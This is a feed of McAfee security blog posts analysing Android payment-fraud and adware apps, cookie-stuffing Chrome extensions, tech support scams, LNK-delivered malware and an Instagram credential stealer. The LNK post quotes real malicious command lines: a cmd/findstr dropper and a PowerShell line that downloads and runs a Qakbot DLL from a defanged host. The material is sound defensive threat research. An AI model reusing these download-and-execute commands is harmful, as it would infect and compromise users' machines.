There are new articles available, click to refresh the page.
✇McAfee Blogs

Fake Security App Found Abuses Japanese Payment System

By: McAfee

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting NTT DOCOMO users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting NTT DOCOMO mobile payment service users. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package name ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.

How Do victims install this malware?

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software.

A SMS message from France (from Twitter post by Yusuke)

A SMS message from France (from Twitter post by Yusuke)

malware on Google play

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive.

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.


What does this malware look like?

When an NTT DOCOMO network user installs and launches this malware, it asks for the Network password. Cleverly, the malware shows incorrect password messages to collect more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Network password.

Ask the Network password twice (Only NTT DOCOMO user can see these)
Ask the Network password twice (Only NTT DOCOMO users can see these)

The Network password is used for the NTT DOCOMO payment service which provides easy online payments. NTT DOCOMO mobile network users can start this payment service by just setting 4-digits password called a Network password. The charge will be paid along with the mobile phone bill. When you need to pay online, you can simply do the payment process by entering the 4-digits password.

After the password activity, the malware shows a fake mobile security screen. Interestingly, the layout of the activity is similar to our old McAfee Mobile Security. All buttons look genuine, but these are all fake.

Interface comparison.
Interface comparison.

How does this malware work?

There is a native library named ‘libmyapp.so’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Network password out to the attacker when the user enters the Network password on the activity.

RPC Function name Description
connect_to Create reverse proxy and connect to remote server
disconnect Disconnect the reverse proxy
get_status Send the reverse proxy status
get_info Send line number, connection type, operator, and so on
toggle_wifi Set the Wi-Fi ON/OFF
show_battery_opt Show dialog to exclude battery optimization for background work

Registered RPC functions description

Initial Hello packet contains personal information
Initial Hello packet contains personal information
Sending out The Network password
Sending out The Network password

To make a fraudulent purchase by using leaked information, the attacker needs to use the victim’s mobile network. The RPC command ‘toggle_wifi’ can switch the Wi-Fi connection status of the victim, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the victim’s mobile network.

Network and command flow diagram
Network and command flow diagram


It is interesting that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications.

IoCs (Indicators of Compromise)


SHA256 Package Name Distribution
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd com.z.cloud.px.app Google Play
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 com.z.cloud.px.app Other
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 com.z.px.appx Google Play
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad com.z.cloud.px.app2 Other
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 com.jg.rc.papp Google Drive
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 com.de.rc.seee Google Drive


The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.

✇McAfee Blogs

Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users

By: McAfee Labs

Authored by Oliver Devane and Vallabh Chole 

September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.


A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000

The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage 

Apart from offering the intended functionality, the extensions also track the user’s browsing activity.  Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.    

The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.  

The 5 extensions are  

Name  Extension ID  Users 
Netflix Party  mmnbenehknklpbendgmgngeaignppnbe  800,000 

Netflix Party 2 

flijfnhifgdcbhglkneplegafminjnhn  300,000 

FlipShope – Price Tracker Extension 


adikhbfjdbjkhelbdnffogkobkekkkej  80,000 

Full Page Screenshot Capture – Screenshotting 


pojgkmkfincpdkdgjepkmdekcahmckjp  200,000 
AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  20,000 


Technical Analysis 

This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.   



The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites. 


The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.  

Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.

Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:

Variable  Description 
Ref  Base64 encoded referral URL 
County  The county of the device 
City  The city of the device 
Zip  The zip code of the device 
Apisend  A random ID generated for the user. 
Name  Base64 encoded URL being visited 
ext_name  The name of the chrome extensions 


The random ID is created by selecting 8 random characters in a character set. The code is shown below: 

The country, city, and zip are gathered using ip-api.com. The code is shown below: 

Upon receiving the URL, langhort.com will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below: 

The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains. 

Two of the functions are detailed below: 

Result[‘c’] – passf_url 

If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.  

Result[‘e’] setCookie 

If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.  

Behavioral flow 

The images below show the step-by-step flow of events while navigating to the BestBuy website.  

  1. The user navigates to bestbuy.com and the extension posts this URL in a Base64 format to d.langhort.com/chrome/TrackData/ 
  2. Langhort.com responds with “c” and the URL. The “c” means the extension will invoke the function passf_url() 
  3. passf_url() will perform a request against the URL 
  4. the URL queried in step 3 is redirected using a 301 response to bestbuy.com with an affiliate ID associated with the Extension owners 
  5. The extension will insert the URL as an Iframe in the bestbuy.com site being visited by the user 
  6. Shows the Cookie being set for the Affiliate ID associated with the Extension owners. They will now receive a commission for any purchases made on bestbuy.com  

Here is a video of the events 

Time delay to avoid automated analysis 

We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.  


This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.  

McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.   

The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog  

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.   

The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.  

Type  Value  Product  Detected 
Chrome Extension  Netflix Party – mmnbenehknklpbendgmgngeaignppnbe  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  FlipShope – Price Tracker Extension – Version – adikhbfjdbjkhelbdnffogkobkekkkej  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Full Page Screenshot Capture 


Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn  Total Protection and LiveSafe  JTI/Suspect 
Chrome Extension  AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed  Total Protection and LiveSafe  JTI/Suspect 
URL  www.netflixparty1.com  McAfee WebAdvisor  Blocked 
URL  netflixpartyplus.com  McAfee WebAdvisor  Blocked 
URL  goscreenshotting.com  McAfee WebAdvisor   Blocked 
URL  langhort.com  McAfee WebAdvisor  Blocked 
URL  Unscart.in  McAfee WebAdvisor  Blocked 
URL  autobuyapp.com  McAfee WebAdvisor  Blocked 

The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.

✇McAfee Blogs

Technical Support Scams – What to look out for

By: McAfee Labs

Authored by Oliver Devane

Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions, that scammers will go through when they are performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.

Advertising – The Lure

For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.

Scammers behind tech support scams can create very convincing websites which mimic the official ones.

Some fraudulent websites use the McAfee logo or other company logos to try trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to official sites to appear legitimate.

These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.


The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.

Gaining Access

The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.

The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.

A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.

It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:

  • TeamViewer
  • LogMeIn
  • AnyDesk
  • Aweray (Awesun)

Activity once the connection is established

If the scammers are given access to the victim’s machine, they will often make use of the command filename cmd.exe to perform some visual activity on the computer screen which is done to attempt to trick the individual into believing that some malicious activity is occurring on their computer or network. Most people will be unaware of the filename cmd.exe and the actions being used,and thus will be none the wiser to the scammer’s actions.

Here are some examples we have seen scammers use:


Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.

Directory enumeration

Scammers will make use of standard functions within the cmd.exe file, to make their victims believe they are performing lots of activity. One of these functions is ‘dir’ which will  display  all the files for a specific directory. For example, if you have a folder called ‘school work’ and have 2 word documents in there, a ‘dir’ query of that folder will appear like this:

What the scammers will do is make use of ‘dir’ and the title function to make you believe they are scanning your machine. Here is an example of running ‘dir’ on the all the files on a machine with the cmd.exe title set to ‘File Scanner’:


A similar function to ‘dir’ called ‘tree’ may also be used. The ‘tree’ function will display directory paths and will generate lots of events on the screen:

Tech Support Phone Number

Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below

Software Installation

Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.

For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.

Some example filenames are:

  • Firewall security.exe
  • Network firewall.exe
  • Network security.exe
  • Email security.exe
  • Banking security.exe


The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity.  As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.

Signs to look out for

This section contains a few signs to look out for which may indicate that you are interacting with a scammer.


Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.

Leave the computer on

Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.

Created files being detected

Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.

What to do

The following steps should be performed if you believe you are being scammed as part of a tech support scam.

Disconnect the machine from the internet

If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings or the computer. It  can be powered down by pressing the power button.

Hang up

Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.

Remove the remote-control software

If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.

The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.

Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button.  Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.

Check the Antivirus Software for any exclusions

Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and if any are present which were not added by yourself to remove them.

A guide for McAfee customers is available here

Update Antivirus Software and perform a full scan

After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.

Change passwords

After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.


This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is https://service.mcafee.com/.

The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:

McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.

The post Technical Support Scams – What to look out for appeared first on McAfee Blog.

✇McAfee Blogs

New HiddenAds malware affects 1M+ users and hides on the Google Play Store

By: McAfee Labs

Authored by Dexter Shin

McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.

HiddenAds functions and promotion

They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.

Figure 1. Malware on Google Play
Figure 1. Malware on Google Play

Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.

In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’

Figure 2. Hide itself by changing icons and names
Figure 2. The Malware hides itself by changing icons and names

Automatically executed services constantly display advertisements to victims in a variety of ways.

Figure 3. A sudden display of advertisements
Figure 3. A sudden display of advertisements

These services also induce users to run an app when they install, uninstall, or update apps on their devices.

Figure 4. A button to induce users to run app

Figure 4. A button to induce users to run app
Figure 4. A button to induce users to run app

To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.

Figure 5. Advertising pages on Facebook

Figure 5. Advertising pages on Facebook
Figure 5. Advertising pages on Facebook

How it works

This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.

Figure 6. Content providers declared with special metadata in manifest
Figure 6. Content providers declared with special metadata in manifest

The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.

The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.

Figure 7. Create a malicious service for displaying ads
Figure 7. Create a malicious service for displaying ads

In addition, the service process will generate immediately even if it is forced to kill.

Figure 8. Malicious service process that continues to generate
Figure 8. Malicious service process that continues to generate

Next, they change their icons and names using the <activity-alias> tag to hide.

Figure 9. Using <activity-alias> tags to change app icons and names
Figure 9. Using tags to change app icons and names

Users infected worldwide

It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:

Figure 10. Top affected countries include South Korea, Japan, and Brazil
Figure 10. Top affected countries include South Korea, Japan, and Brazil


This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.

We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Indicators of Compromise


App Name Package Name Downloads
Junk Cleaner cn.junk.clean.plp 1M+
EasyCleaner com.easy.clean.ipz 100K+
Power Doctor com.power.doctor.mnb 500K+
Super Clean com.super.clean.zaz 500K+
Full Clean -Clean Cache org.stemp.fll.clean 1M+
Fingertip Cleaner com.fingertip.clean.cvb 500K+
Quick Cleaner org.qck.cle.oyo 1M+
Keep Clean org.clean.sys.lunch 1M+
Windy Clean in.phone.clean.www 500K+
Carpet Clean og.crp.cln.zda 100K+
Cool Clean syn.clean.cool.zbc 500K+
Strong Clean in.memory.sys.clean 500K+
Meteor Clean org.ssl.wind.clean 100K+



  • 4b9a5de6f8d919a6c534bc8595826b9948e555b12bc0e12bbcf0099069e7df90
  • 4d8472f0f60d433ffa8e90cc42f642dcb6509166cfff94472a3c1d7dcc814227
  • 5ca2004cfd2b3080ac4958185323573a391dafa75f77246a00f7d0f3b42a4ca3
  • 5f54177a293f9678797e831e76fd0336b0c3a4154dd0b2175f46c5a6f5782e24
  • 7a502695e1cab885aee1a452cd29ce67bb1a92b37eed53d4f2f77de0ab93df9b
  • 64d8bd033b4fc7e4f7fd747b2e35bce83527aa5d6396aab49c37f1ac238af4bd
  • 97bd1c98ddf5b59a765ba662d72e933baab0a3310c4cdbc50791a9fe9881c775
  • 268a98f359f2d56497be63a31b172bfbdc599316fb7dec086a937765af42176f
  • 690d658acb9022765e1cf034306a1547847ca4adc0d48ac8a9bbdf1e6351c0f7
  • 75259246f2b9f2d5b1da9e35cab254f71d82169809e5793ee9c0523f6fc19e4b
  • a5cbead4c9868f83dd9b4dc49ca6baedffc841772e081a4334efc005d3a87314
  • c75f99732d4e4a3ec8c19674e99d14722d8909c82830cd5ad399ce6695856666


  • http[://]hw.sdk.functionads.com:8100

The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.

✇McAfee Blogs

Rise of LNK (Shortcut files) Malware

By: McAfee Labs

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks
Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user
Figure 2 _ LNK files as seen by a normal user


With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.




Figure 3 _Emotet delivered via LNK file Infection-Chain
Figure 3 _Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached
Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _Properties of Emotet LNK sample
Figure 5 _Properties of Emotet LNK sample

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file
Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.



Figure 7 _ IcedID delivered via LNK file Infection-Chain
Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

Figure 8 _ Properties of IcedID LNK sample
Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.



Figure 9 _ Qakbot delivered via LNK file Infection-Chain
Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample
Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.


As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type SHA-256 Scanner  
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA

Suspicious ZIP!lnk

Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR


URLs (Uniform Resource Locator) hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/








WebAdvisor All URLs Blocked


The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

✇McAfee Blogs

Instagram credentials Stealers: Free Followers or Free Likes

By: McAfee Labs

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Figure 1. Suspicious apps in Google Images 
Figure 1. Suspicious apps in Google Images

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

  1. Log in with user account and password. 
  2. Check credentials via Instagram API. 
  3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
  4. In the case of free followers, the user needs to input how many followers they want to gain.  
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.

When you run the function, you can see that the number of followers increases every few seconds. 

Figure 3. New follower notifications appear in the feed.
Figure 3. New follower notifications appear in the feed.

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

Figure 4. Message being promoted on Telegram
Figure 4. Message being promoted on Telegram

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Figure 5. Many people complain that their Instagram accounts are being compromised

Behavior Analysis in Malware 

We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

Figure 6. Redirect to malicious website via Android Webview

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

Figure 7. Simple 2 lines of initial code
Figure 7. Simple 2 lines of initial code

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

Figure 8. Abnormal login attempt notification
Figure 8. Abnormal login attempt notification

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 


As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 


  • e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 
  • 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 


  • https[://]insfreefollower.com 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

✇McAfee Blogs

Instagram credentials Stealer: Disguised as Mod App

By: McAfee Labs

Authored by Dexter Shin 

